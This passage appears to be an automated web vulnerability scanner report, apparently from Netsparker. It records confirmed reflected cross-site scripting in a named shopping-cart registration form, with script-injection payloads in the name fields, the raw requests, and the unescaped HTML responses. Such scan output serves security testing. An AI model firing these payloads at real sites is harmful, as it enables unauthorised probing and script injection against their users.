</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST '"--></style></script><script>alert(0x0001DB)</script>
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 366
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001DB)%3c%2fscript%3e&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:13 GMT
Content-Length: 12518
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x0001DB)</script>"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST '"--></style></script><script>alert(0x0001DC)</script>
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 366
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001DC)%3c%2fscript%3e&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:15 GMT
Content-Length: 12518
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="'"--></style></script><script>netsparker(0x0001DC)</script>"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST '"--></style></script><script>alert(0x0001DD)</script>
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001DD)%3c%2fscript%3e&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:18 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="'"--></style></script><script>netsparker(0x0001DD)</script>"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
